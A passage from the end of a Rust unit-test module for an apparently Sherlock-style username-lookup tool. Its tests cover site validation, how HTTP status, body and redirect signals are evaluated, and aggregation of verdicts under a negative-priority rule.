902            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
903            s.name = ok.into();
904            assert!(s.validate().is_ok(), "expected {ok:?} to validate");
905        }
906    }
907
908    #[test]
909    fn validate_rejects_overlong_name() {
910        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
911        s.name = "A".repeat(100);
912        let err = s.validate().unwrap_err();
913        assert!(err.to_string().contains("longer than"));
914    }
915
916    #[test]
917    fn validate_accepts_well_formed_regex_check() {
918        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
919        s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
920        assert!(s.validate().is_ok());
921    }
922
923    #[test]
924    fn validate_tolerates_unsupported_regex_features() {
925        // Sherlock-imported regexes occasionally use lookarounds
926        // (e.g. `(?!...)`) that Rust's `regex` crate can't compile —
927        // those sites should still load, with the username-gate
928        // silently disabled rather than rejecting the whole site.
929        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
930        s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
931        assert!(
932            s.validate().is_ok(),
933            "lookaround-bearing regex should warn, not reject the site"
934        );
935    }
936
937    #[test]
938    fn signal_status_found_votes_only_on_match() {
939        let signal = Signal::StatusFound { codes: vec![200] };
940        let probe = Probe {
941            status: 200,
942            final_url: "https://example.com/alice",
943            body: "",
944        };
945        assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
946        let probe = Probe {
947            status: 404,
948            ..probe
949        };
950        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
951    }
952
953    #[test]
954    fn signal_status_not_found_votes_only_on_match() {
955        let signal = Signal::StatusNotFound { codes: vec![404] };
956        let probe = Probe {
957            status: 404,
958            final_url: "",
959            body: "",
960        };
961        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
962        let probe = Probe {
963            status: 200,
964            ..probe
965        };
966        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
967    }
968
969    #[test]
970    fn signal_body_absent_votes_not_found_when_text_present() {
971        let signal = Signal::BodyAbsent {
972            text: "Profile not found".into(),
973        };
974        let probe = Probe {
975            status: 200,
976            final_url: "",
977            body: "<h1>Profile not found</h1>",
978        };
979        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
980        let probe = Probe {
981            body: "<h1>Welcome alice</h1>",
982            ..probe
983        };
984        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
985    }
986
987    #[test]
988    fn signal_redirect_absent_inspects_final_url() {
989        let signal = Signal::RedirectAbsent {
990            fragment: "/login".into(),
991        };
992        let probe = Probe {
993            status: 200,
994            final_url: "https://example.com/login?next=/alice",
995            body: "",
996        };
997        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
998        let probe = Probe {
999            final_url: "https://example.com/alice",
1000            ..probe
1001        };
1002        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
1003    }
1004
1005    #[test]
1006    fn aggregate_found_when_only_found_signals_fire() {
1007        let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
1008        assert_eq!(kind, MatchKind::Found);
1009    }
1010
1011    #[test]
1012    fn aggregate_not_found_when_only_not_found_signals_fire() {
1013        let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
1014        assert_eq!(kind, MatchKind::NotFound);
1015    }
1016
1017    #[test]
1018    fn aggregate_not_found_wins_over_found() {
1019        // Negative-priority: a NotFound vote outranks a Found vote.
1020        let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
1021        assert_eq!(kind, MatchKind::NotFound);
1022    }
1023
1024    #[test]
1025    fn aggregate_uncertain_when_no_signals_fire() {
1026        let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
1027        assert_eq!(kind, MatchKind::Uncertain);
1028    }
1029
1030    #[test]
1031    fn aggregate_empty_is_uncertain() {
1032        let kind = aggregate(std::iter::empty());
1033        assert_eq!(kind, MatchKind::Uncertain);
1034    }
1035
1036    #[test]
1037    fn needs_body_is_true_only_for_body_signals() {
1038        assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
1039        assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
1040        assert!(
1041            !Signal::RedirectAbsent {
1042                fragment: "/login".into()
1043            }
1044            .needs_body()
1045        );
1046        assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
1047        assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
1048    }
1049
1050    #[test]
1051    fn deserializes_signal_list() {
1052        let json = r#"{
1053            "name": "GitHub",
1054            "url": "https://github.com/{username}",
1055            "signals": [
1056                { "kind": "status_found", "codes": [200] },
1057                { "kind": "status_not_found", "codes": [404] }
1058            ]
1059        }"#;
1060        let site: Site = serde_json::from_str(json).unwrap();
1061        assert_eq!(site.name, "GitHub");
1062        assert_eq!(site.signals.len(), 2);
1063        site.validate().unwrap();
1064    }
1065
1066    proptest::proptest! {
1067        /// For any mix of per-signal verdicts, aggregation obeys the
1068        /// negative-priority spec: any NotFound wins; else any Found; else
1069        /// Uncertain.
1070        #[test]
1071        fn aggregate_matches_negative_priority_spec(
1072            votes in proptest::collection::vec(
1073                proptest::prop_oneof![
1074                    proptest::strategy::Just(SignalVerdict::Found),
1075                    proptest::strategy::Just(SignalVerdict::NotFound),
1076                    proptest::strategy::Just(SignalVerdict::Ambiguous),
1077                ],
1078                0..16,
1079            ),
1080        ) {
1081            let kind = aggregate(votes.iter().copied());
1082            let expected = if votes.contains(&SignalVerdict::NotFound) {
1083                MatchKind::NotFound
1084            } else if votes.contains(&SignalVerdict::Found) {
1085                MatchKind::Found
1086            } else {
1087                MatchKind::Uncertain
1088            };
1089            proptest::prop_assert_eq!(kind, expected);
1090        }
1091    }
1092}